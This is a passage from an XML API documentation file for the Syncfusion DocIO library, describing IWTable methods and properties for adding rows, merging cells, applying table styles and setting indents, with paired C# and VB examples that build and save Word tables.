                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into first row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("$40")
                'Add second row to table
                row = table.AddRow(False)
                'Add the first cell into first row 
                cell = row.Cells(0)
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into first row 
                cell = row.Cells(1)
                cell.AddParagraph().AppendText("$30")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.AddRow(System.Boolean)">
            <summary>
            Adds a new row to table specifying whether to have the same format as the previous row.
            </summary>
            <param name="isCopyFormat"><b>True</b> if to have the same format as previous row; otherwise, <b>false</b>.</param>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.</returns>
            <example>The following example illustrates how to add new row to the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row to table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into first row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("$40");
                //Add second row to table
                row = table.AddRow(false);
                //Add the first cell into first row 
                cell = row.Cells[0];
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into first row 
                cell = row.Cells[1];
                cell.AddParagraph().AppendText("$30");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row to table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into first row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("$40")
                'Add second row to table
                row = table.AddRow(False)
                'Add the first cell into first row 
                cell = row.Cells(0)
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into first row 
                cell = row.Cells(1)
                cell.AddParagraph().AppendText("$30")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.AddRow(System.Boolean,System.Boolean)">
            <summary>
            Adds a new row to table specifying whether to have the same format and cells count similar to the previous row.
            </summary>
            <param name="isCopyFormat"><b>True</b> if to have the same format as previous row; otherwise, <b>false</b>.</param>
            <param name="autoPopulateCells"><b>True</b> if need to auto populate cells; otherwise, <b>false</b>.</param>
            <returns>The reference to the newly added <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.</returns>
            <example>The following example illustrates how to add a row with formatting similar to the previous row.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row into table
                WTableRow row = table.AddRow();
                //Add the first cell into first row 
                WTableCell cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Item");
                //Add the second cell into first row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Price($)");
                //Add the second row into table
                row = table.AddRow(true, false);
                //Add the first cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("50");
                //Add the third row into table
                row = table.AddRow(true, false);
                //Add the first cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("30");
                document.Save("Table.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row into table
                Dim row As WTableRow = table.AddRow()
                'Add the first cell into first row 
                Dim cell As WTableCell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Item")
                'Add the second cell into first row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Price($)")
                'Add the second row into table
                row = table.AddRow(True, False)
                'Add the first cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("50")
                'Add the third row into table
                row = table.AddRow(True, False)
                'Add the first cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("30")
                document.Save("Table.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.ResetCells(System.Int32,System.Int32)">
            <summary>
            Resets the table with the specified number of rows and columns.
            </summary>
            <param name="rowsNum">The <b>integer</b> specifies the number of rows.</param>
            <param name="columnsNum">The <b>integer</b> specifies the number of columns.</param>
            <example>The following example illustrates how to add a table to the document.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Gets the first section in the document
                IWSection section = document.AddSection();
                //Add new table to the section
                IWTable table = section.AddTable();
                //Set rows and columns count
                table.ResetCells(2, 2);
                //Add contents to the table
                IWParagraph paragraph = table[0, 0].AddParagraph();
                paragraph.AppendText("Apple");
                paragraph = table[0, 1].AddParagraph();
                paragraph.AppendText("Red");
                paragraph = table[1, 0].AddParagraph();
                paragraph.AppendText("Banana");
                paragraph = table[1, 1].AddParagraph();
                paragraph.AppendText("Yellow");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Gets the first section in the document
                Dim section As IWSection = document.AddSection()
                'Add new table to the section
                Dim table As IWTable = section.AddTable()
                'Set rows and columns count
                table.ResetCells(2, 2)
                'Add contents to the table
                Dim paragraph As IWParagraph = table(0, 0).AddParagraph()
                paragraph.AppendText("Apple")
                paragraph = table(0, 1).AddParagraph()
                paragraph.AppendText("Red")
                paragraph = table(1, 0).AddParagraph()
                paragraph.AppendText("Banana")
                paragraph = table(1, 1).AddParagraph()
                paragraph.AppendText("Yellow")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.ResetCells(System.Int32,System.Int32,Syncfusion.DocIO.DLS.RowFormat,System.Single)">
            <summary>
            Resets the table with the specified number of rows and columns, table format and cell width.
            </summary>
            <param name="rowsNum">The <b>integer</b> specifies the number of rows.</param>
            <param name="columnsNum">The <b>integer</b> specifies the number of columns.</param>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.RowFormat"/> specifies the  format for the table.</param>
            <param name="cellWidth">The <b>float</b> specifies the width of the cells.</param>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                RowFormat format = new RowFormat();
                format.BackColor = Color.LightGray;
                format.CellSpacing = 2;
                format.Paddings.All = 2;
                //Set number of rows and columns
                table.ResetCells(2, 2, format, 200);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                Dim format As New RowFormat()
                format.BackColor = Color.LightGray
                format.CellSpacing = 2
                format.Paddings.All = 2
                'Set number of rows and columns
                table.ResetCells(2, 2, format, 200)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.ApplyVerticalMerge(System.Int32,System.Int32,System.Int32)">
            <summary>
            Applies the vertical merge for table cells specified by the column index, start row index and end row index.
            </summary>
            <param name="columnIndex">The <b>integer</b> specifies index of the column.</param>
            <param name="startRowIndex">The <b>integer</b> specifies start index of the row.</param>
            <param name="endRowIndex">The <b>integer</b> specifies end index of the row.</param>
            <example>The following example illustrates how to apply vertical merge for the table cells.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Vertical merging of Table cells");
                IWTable table = section.AddTable();
                table.ResetCells(5, 5);
                //Specify the vertical merge to the third cell, from second row to fifth row
                table.ApplyVerticalMerge(2, 1, 4);
                document.Save("VerticalMerge.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Vertical merging of Table cells")
                Dim table As IWTable = section.AddTable()
                table.ResetCells(5, 5)
                'Specify the vertical merge to the third cell, from second row to fifth row
                table.ApplyVerticalMerge(2, 1, 4)
                document.Save("VerticalMerge.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.ApplyHorizontalMerge(System.Int32,System.Int32,System.Int32)">
            <summary>
            Applies horizontal merge for table cells specified by the row index, start cell index and end cell index.
            </summary>
            <param name="rowIndex">The <b>integer</b> specifies index of the row.</param>
            <param name="startCellIndex">The <b>integer</b> specifies start index of the cell.</param>
            <param name="endCellIndex">The <b>integer</b> specifies end index of the cell.</param>
            <example>The following example illustrates how to apply horizontal merge for the table cells.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                section.AddParagraph().AppendText("Vertical merging of Table cells");
                IWTable table = section.AddTable();
                table.ResetCells(5, 5);
                //Specify the horizontal merge from second cell to fifth cell in third row
                table.ApplyHorizontalMerge(2, 1, 4);
                document.Save("HorizontalMerge.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Vertical merging of Table cells")
                Dim table As IWTable = section.AddTable()
                table.ResetCells(5, 5)
                'Specify the horizontal merge from second cell to fifth cell in third row
                table.ApplyHorizontalMerge(2, 1, 4)
                document.Save("HorizontalMerge.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.RemoveAbsPosition">
            <summary>
            Removes the absolute position data, if the table has absolute position in the document.  
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.ApplyStyle(Syncfusion.DocIO.DLS.BuiltinTableStyle)">
            <summary>
            Applies the built-in table style to the table.
            </summary>
            <param name="builtinTableStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinTableStyle"/> to be applied for the table.</param>
            <example>The following example illustrates how to apply built-in style for the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                //Get the table
                WTable table = section.Tables[0] as WTable;
                //Apply "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                'Get the table
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Apply "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWTable.GetStyle">
            <summary>
            Gets the style applied for the table.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTableStyle"/> of the current table.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.Rows">
            <summary>
            Gets the rows collection that represent all the rows in the table. Read-only.
            </summary>
            <value>The collection of rows in the table.</value>
            <seealso cref="T:Syncfusion.DocIO.DLS.WRowCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.WTableRow"/>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.TableFormat">
            <summary>
            Gets the table format. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.RowFormat"/> object that specifies the table format.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.LastCell">
            <summary>
            Gets the last cell in last row. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> object that represents the last cell.</value>
            <example>The following example illustrates how to get the last cell of the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get the last cell
                WTableCell cell = table.LastCell;            
                //Apply text direction to the last cell
                cell.CellFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.Vertical;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get the last cell
                Dim cell As WTableCell = table.LastCell
                'Apply text direction to the last cell
                cell.CellFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.Vertical
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.FirstRow">
            <summary>
            Gets the first row in table. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> object that represents the first row in the table.</value> 
            <example>The following example illustrates how to get the first row of the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get the last cell
                WTableRow row = table.FirstRow;            
                //Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get the last cell
                Dim row As WTableRow = table.FirstRow
                'Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.LastRow">
            <summary>
            Gets the last row in table. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> object that represents the last row in the table.</value> 
            <example>The following example illustrates how to get the last row of the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load a template document
                WordDocument document = new WordDocument("Template.docx");
                //Get the table
                WTable table = document.Sections[0].Tables[0] as WTable;
                //Get the last cell
                WTableRow row = table.LastRow;            
                //Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load a template document
                Dim document As New WordDocument("Template.docx")
                'Get the table
                Dim table As WTable = TryCast(document.Sections(0).Tables(0), WTable)
                'Get the last cell
                Dim row As WTableRow = table.LastRow
                'Apply text direction to the last cell
                row.RowFormat.BackColor = Color.LightGray
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example> 
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.Item(System.Int32,System.Int32)">
            <summary>
            Gets the table cell at the specified row and column index. Read-only.
            </summary>
            <param name="row">The <b>integer</b> that specifies the row index.</param>
            <param name="column">The <b>integer</b> that specifies the column index.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> object at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the table.</exception>
            <example>The following example illustrates how to get the cell in the table.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Add new table.
                IWTable table = section.AddTable();
                table.ResetCells(2, 2);
                //Add content to table cell
                table[0, 0].AddParagraph().AppendText("First row, First cell");
                table[0, 1].AddParagraph().AppendText("First row, Second cell");
                table[1, 0].AddParagraph().AppendText("Second row, First cell");
                table[1, 1].AddParagraph().AppendText("Second row, Second cell");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                section.AddParagraph().AppendText("Horizontal merging of Table cells")
                'Add new table.
                Dim table As IWTable = section.AddTable()
                table.ResetCells(2, 2)
                'Add content to table cell
                table(0, 0).AddParagraph().AppendText("First row, First cell")
                table(0, 1).AddParagraph().AppendText("First row, Second cell")
                table(1, 0).AddParagraph().AppendText("Second row, First cell")
                table(1, 1).AddParagraph().AppendText("Second row, Second cell")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.Width">
            <summary>
            Gets the width of the table(in points).
            </summary>
            <value>The <b>float</b> that specifies the width of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.Title">
            <summary>
            Gets or sets the table title.
            </summary>
            <value>The <b>string</b> that specifies the title of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.Description">
            <summary>
            Gets or sets the table description.
            </summary>
            <value>The <b>string</b> that specifies the description of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.ApplyStyleForHeaderRow">
            <summary>
            Gets or sets a value indicating whether to apply heading-row formatting to the first row of the table. 
            The default value is <b>true</b>.
            </summary>
            <value><b>True</b> if need to apply style for first row; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for header row of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Disable special formatting for header row of the table
                table.ApplyStyleForHeaderRow = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Disable special formatting for header row of the table
                table.ApplyStyleForHeaderRow = False
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.ApplyStyleForLastRow">
            <summary>
            Gets or sets a value indicating whether to apply last-row formatting to the last row of the specified table.
            </summary>
            <value><b>True</b> if need to apply style for last row; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for last row of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Enable special formatting for last row of the table
                table.ApplyStyleForLastRow = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for last row of the table
                table.ApplyStyleForLastRow = True
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.ApplyStyleForFirstColumn">
            <summary>
            Gets or sets a value indicating whether to apply first-column formatting to the first column of the specified table. 
            The default value is <b>true</b>.
            </summary>
            <value><b>True</b> if need to apply style for first column; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for first column of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Disable special formatting for first column of the table
                table.ApplyStyleForFirstColumn = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Disable special formatting for first column of the table
                table.ApplyStyleForFirstColumn = False
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.ApplyStyleForLastColumn">
            <summary>
            Gets or sets a value indicating whether to apply last-column formatting to the last column of the specified table..
            </summary>
            <value><b>True</b> if need to apply style for last column; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for last column of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Enable special formatting for last column of the table
                table.ApplyStyleForLastColumn = true;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for last column of the table
                table.ApplyStyleForLastColumn = True
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.ApplyStyleForBandedRows">
            <summary>
            Gets or sets a value indicating whether to apply style bands to the rows in a table, 
            if an applied preset table style provides style banding for rows. The default value is <b>True</b>.
            </summary>
            <value><b>True</b> if need to apply style for banded rows; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for banded rows of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Disable special formatting for banded rows of the table
                table.ApplyStyleForBandedRows = false;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for banded rows of the table
                table.ApplyStyleForBandedRows = False
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.ApplyStyleForBandedColumns">
            <summary>
            Gets or sets a value indicating whether to apply style bands to the columns in a table, 
            if an applied preset table style provides style banding for columns.
            </summary>
            <value><b>True</b> if need to apply style for banded columns; otherwise, <b>false</b>.</value>
            <example>The following example illustrates how to apply style for banded columns of the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Table.docx", FormatType.Docx);
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading);
                //Enable special formatting for banded columns of the table 
                table.ApplyStyleForBandedColumns = true;
                //Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Table.docx", FormatType.Docx)
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Applies "LightShading" built-in style to table
                table.ApplyStyle(BuiltinTableStyle.LightShading)
                'Enable special formatting for banded columns of the table 
                table.ApplyStyleForBandedColumns = True
                'Save and close the document
                document.Save("TableStyle.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWTable.IndentFromLeft">
            <summary>
            Gets or sets the indent from left for the table.
            </summary>
            <value>The <b>float</b> value that indicates the indent from left.</value>
            <example>The following example illustrates how to set the left indent for the table.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Set number of rows and columns
                table.ResetCells(2, 2);
                //Set left indent for table.
                table.IndentFromLeft = 10;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Set number of rows and columns
                table.ResetCells(2, 2)
                'Set left indent for table.
                table.IndentFromLeft = 10
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.Layouting.ITableWidget">
            <summary>
            Represents a Widget with table layout.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.ITableWidget.GetCellWidget(System.Int32,System.Int32)">
            <summary>
            Gets cell widget by row/column indexes.
            </summary>
            <param name="row"></param>
            <param name="column"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.ITableWidget.GetRowWidget(System.Int32)">
            <summary>
            Gets row widget by row index.
            </summary>
            <param name="row"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.Layouting.ITableWidget.MaxRowIndex">
            <summary>
            Gets the row index which contains max no of cells or columns
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ITableWidget.RowsCount">
            <summary>
            Gets rows count.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ITableWidget.ColumnsCount">
